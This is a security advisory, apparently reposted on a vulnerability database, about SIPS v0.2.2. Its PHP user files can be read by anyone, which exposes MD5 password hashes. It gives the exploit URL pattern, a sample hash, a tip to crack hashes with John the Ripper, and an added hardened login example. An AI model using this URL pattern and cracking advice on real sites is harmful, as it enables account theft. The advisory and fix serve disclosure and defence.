SIPS (PHP)

2008.03.26
Credit: subj
Risk: Medium
Local: No
Remote: Yes
CWE: CWE-200


CVSS Base Score: 4.3/10
Impact Subscore: 2.9/10
Exploitability Subscore: 8.6/10
Access required: Remote
Attack complexity: Medium
Authentication: Not required
Confidentiality impact: Partial
Integrity impact: None
Availability impact: None

Product : SIPS
Version : v0.2.2
WebSite : http://www.squishdot.org
Problem : Viewing users' accounts

Description:
------------
You can easily look through any user's account without any permissions.
Each account is stored in a directory named after the first letter of the user's login.
For example, foo will have a URL like this one:

/sipssys/users/f/foo/user

So the user's info file can be viewed. It gives you the MD5 hash of the password,
which you can try to crack with JtR or any other software.

E.g.:
http://localhost/sips/sipssys/users/t/test/user

Password::47bce5c74f589f4867dbd57e9ca9f808 // MD5
Email::test@localhost
Theme::default

==========
login.php:
==========
[...]
if ($action == "login") {
    if ($username) {
        if (file_exists($config["sipssys"] ."/users/$username[0]/$username/user")) {
            $cryptpass = md5($password);
            if (getUserValue($username, "Password") == $cryptpass) {
                $cryptuser = "$username:$cryptpass";
[...]

Exploit:
--------
http://[somehost]/[sips_directory]/sipssys/users/[first_letter_of_UserID]/[UserID]/user

Link:
=====
www.dwcgr0up.com
irc.dwcgr0up.biz:6667

Fixes:
=====
You can find all our fixes on our homepage [www.dwcgroup.com]

Thanks:
=======
GipsHack crew : DHGroup etc etc
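
A hardened take on the login.php logic quoted above, as an added example (not SIPS code and not the advisory author's fix): user records live outside the web root so they cannot be fetched by URL, and the unsalted MD5 comparison is replaced by password_hash()/password_verify(), with legacy hashes upgraded on a successful login. USER_DIR, userFile(), readUserRecord(), writeUserRecord() and verifyLogin() are hypothetical names; the "Key::Value" record format is the one shown in the sample file.

```php
<?php
// Added example, not SIPS code; assumes the "Key::Value" record format shown above.
const USER_DIR = '/var/lib/sips/users'; // assumed path, outside the served directory

function userFile(string $username): ?string {
    // Allow-list the login before it is used as a path component.
    if (!preg_match('/^[a-z0-9_]{1,32}$/i', $username)) {
        return null;
    }
    return USER_DIR . '/' . $username[0] . '/' . $username . '/user';
}

function readUserRecord(string $path): array {
    $record = [];
    foreach (file($path, FILE_IGNORE_NEW_LINES | FILE_SKIP_EMPTY_LINES) ?: [] as $line) {
        $parts = explode('::', $line, 2);
        if (count($parts) === 2) {
            $record[$parts[0]] = $parts[1];
        }
    }
    return $record;
}

function writeUserRecord(string $path, array $record): void {
    $lines = '';
    foreach ($record as $key => $value) {
        $lines .= $key . '::' . $value . "\n";
    }
    file_put_contents($path, $lines, LOCK_EX);
}

function verifyLogin(string $username, string $password): bool {
    $path = userFile($username);
    if ($path === null || !is_file($path)) {
        return false;
    }
    $record = readUserRecord($path);
    $stored = $record['Password'] ?? '';
    if (preg_match('/^[0-9a-f]{32}$/', $stored)) {
        // Legacy unsalted MD5: compare in constant time, then upgrade the record.
        if (!hash_equals($stored, md5($password))) {
            return false;
        }
        $record['Password'] = password_hash($password, PASSWORD_DEFAULT);
        writeUserRecord($path, $record);
        return true;
    }
    return password_verify($password, $stored);
}
```

Where the data directory cannot be moved, denying web access to sipssys/ in the server configuration closes the same exposure.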


Copyright 2024, cxsecurity.com

 
